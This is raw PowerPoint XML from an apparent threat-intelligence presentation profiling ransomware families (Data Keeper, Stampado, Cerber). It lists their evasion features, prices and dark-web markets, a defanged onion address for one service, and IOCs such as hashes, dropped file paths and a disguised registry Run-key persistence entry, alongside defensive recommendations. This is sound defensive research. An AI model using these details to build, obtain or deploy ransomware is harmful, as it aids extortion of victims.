        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990850" y="6076950"/>
            <a:ext cx="3676650" cy="514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855332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28352-5A17-4ED8-896C-2B574C49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keeper</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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1ACEA-DA58-4FED-8E8D-57F1A16918C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/>
              <a:t>Threat Actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Characteristics: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AES and RSA-4096</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available on hxxp://3whyfziey2vr4lyq[.]onion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 1st .NET RaaS that uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ConfuserEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> obfuscator. Data Keeper uses an AES symmetric cipher to encrypt user files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Price:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Market:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit Kit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IOC’s:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" b="1" dirty="0" err="1"/>
              <a:t>Encrypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t> 912bfac6b434d0fff6cfe691cd8145aec0471aa73beaa957898cfabd06067567</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-CR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-CR" b="1" dirty="0" err="1"/>
              <a:t>Decrypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>8616263bdbbfe7cd1d702f3179041eb75721b0d950c19c2e50e823845955910d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="https://4.bp.blogspot.com/-qG8tsWGn_oY/Wo8Lr_ANQ-I/AAAAAAAAJM0/TOMmgkvbWcoY93tYoQkhER0SDBPuDDcuQCLcBGAs/s1600/001.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{924FBD7B-13D9-4B00-82F5-36D8B3A47B8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910" y="1825625"/>
            <a:ext cx="4318180" cy="3959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5429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EAE7A-605C-4825-B951-40994DEB4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Stuff I found nice or interesting</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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66164-D5C9-47AB-9322-03AD619F9F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trike="sngStrike" dirty="0"/>
              <a:t>Speak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blowfish/RSA 2048 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerWare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud services*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legitimate websites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950AD29-E8BE-48DF-831D-C38BC17035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0928" y="719137"/>
            <a:ext cx="3326478" cy="54197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86408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4C0A142D-45C9-4E58-AA54-53CDB942C0A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044" y="1033144"/>
            <a:ext cx="6355715" cy="42371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2681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C8F6-F7B3-451F-9E6E-A4911C3C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Enterprise</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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59208D-9F20-46BC-9245-B1ED4A0E079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Some of them right now!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filter attachment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block Macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable WSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BACK UP!(security backups)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Endpoint security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand your network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make the right choice while looking for security solutions</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0"/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102D8966-9857-414D-B442-8197543D511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2" y="2871392"/>
            <a:ext cx="5181600" cy="2913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267F9D-5385-49DE-88A8-55F8CA23B454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8763002" y="1168400"/>
            <a:ext cx="401318" cy="1828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32E1817-3CEE-4FA3-9103-D3B93A020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0650" y="137915"/>
            <a:ext cx="2343150" cy="21431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170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F5792-519C-4679-8AF7-3494989C3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end users (Free and paid)</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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BBD37D4-D556-4566-9831-CC2181A5C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R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C1B275-8C44-4C61-9744-3FF93F175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122" y="2844800"/>
            <a:ext cx="9816816" cy="115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578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7C4CD-CA0D-4450-BA50-C934D0F5F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Latch ARW</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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5451A6D-0FC7-4DAF-B120-DF011305C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4505" y="1825625"/>
            <a:ext cx="9502990" cy="3949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3892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7272D-0E34-4AB5-8650-0F41E7BE3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Cath me if you can!	</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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AE70D-439D-4B99-A091-676C80349D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Earth	</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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82702B-8E8B-4FA9-9801-B48A7E813B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RedFox</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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783FD6E-AC44-4801-BF25-1C63A12BFD1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098966" y="2505075"/>
            <a:ext cx="3329655" cy="3335338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for unknown picture">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4995519F-6508-41BB-996E-85DCBC263B6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331" y="2505075"/>
            <a:ext cx="2250701" cy="333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5238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AEFA2-F3A6-4B7D-B185-130CA612D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Specials thanks to:</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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DC4D3-6F76-45B6-A26F-8720DA675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malwarehunterteam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>chrisdoman</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>fwosar</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>campuscodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>bleeding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>thecedricz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0"/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022364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3DDB9-3E1D-4751-B71F-529ADD675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  <a:endParaRPr lang="es-CR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9CA473-2821-4F3A-9747-23867FCAF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194560"/>
            <a:ext cx="5140960" cy="2891790"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363308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Sirius_malware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Siriusmalware@protonmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>               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798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5074F-4C83-4343-BF12-A6E3D008E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  <a:endParaRPr lang="es-CR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89CB9B4-CC28-4A5F-A972-EF916FF12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3180026"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1033670"/>
          <a:ext cx="10717696" cy="4741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3112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CB384-54E6-4543-90D9-4AE58A449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es-C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06BE7-3525-43BE-B6D9-C2ECF181B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/>
              <a:t>Figure 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Stampado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> Overall activity diagram.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1"/>
              <a:t>November</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> 21, 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> https://www.zscaler.com/blogs/research/look-recent-stampado-ransomware-variant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t>Figure 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> May,2, 2017. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolution/</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.checkpoint.com/downloads/resources/cerber-report.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t>2018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Trends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t> Allan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1"/>
              <a:t>Liska</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t>, March, 7, 2018 https://www.informationsecuritybuzz.com/articles/2018-ransomware-trends/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Earth and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Redfox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> information found on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://twitter.com/i/web/status/964130871036047360</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0"/>
              <a:t>eta LATCH ARW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.elevenpaths.com/labstools/antiransomware/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0"/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198623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5074F-4C83-4343-BF12-A6E3D008E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  <a:endParaRPr lang="es-CR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89CB9B4-CC28-4A5F-A972-EF916FF12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6900539"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1033670"/>
          <a:ext cx="10717696" cy="4741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886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F97AB8-1BE3-4E47-85D0-2996C36C0B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08117" y="393065"/>
            <a:ext cx="6728725" cy="52258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61777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81AD9-ED1B-465F-90CE-A96DA9D80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Stampado</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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0B248-5D5F-4FCD-AF3C-1FB3EF1934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49387"/>
            <a:ext cx="5371706" cy="4335593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Threat actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The rainmaker and others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Characteristics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has a worm-like spreading functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will re-encrypt already encrypted files (other ransomwares)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Stampado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encrypts files using AES (Advanced Encryption Standard) and a Symmetric key encryption algorithm (which uses same key for encryption and decryption) with key length of 256. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Price:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Market:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Alphabay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> market (currently down)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit kit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sundown-pirate and RIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IOC’s: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%\scvhost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%\&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>Hexdecimalname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>%\&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>Hexdecimalname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>DrivePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>]\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" err="1"/>
              <a:t>myDisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>\drivers.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0" err="1"/>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0"/>
              <a:t>&gt;/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0" err="1"/>
              <a:t>encryptedname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0"/>
              <a:t>&gt;.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2500" dirty="0" err="1"/>
              <a:t>locked</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Windows Update" %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>%\scvhost.exe</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-CR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="Stampado overall activity diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C913599-B2B8-448C-8DED-AB04CB4EAF7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1347" y="1449387"/>
            <a:ext cx="4901012" cy="3959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32A3F5-0158-4906-90FC-AB6734F39D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6721312" y="5408612"/>
            <a:ext cx="5109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Figure 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Stampado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> overall activity diagram</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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730576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C551C-C4BE-49EE-BFB1-D081793A2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Cerber</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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76CCB9B-E069-4634-8115-BF846D74C6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81567" y="365125"/>
            <a:ext cx="4874827" cy="59632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9D3CE6-C031-4683-A139-44989D3A31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49387"/>
            <a:ext cx="5371706" cy="4335593"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Threat actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> crbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="30000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Characteristics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Latest version anti VM and anti sandboxing features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>RC4 and RSA 2048/576 algorithms are used for file encryption. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>UAC Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Price:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Market:</a:t>
            </a:r>
            <a:r>
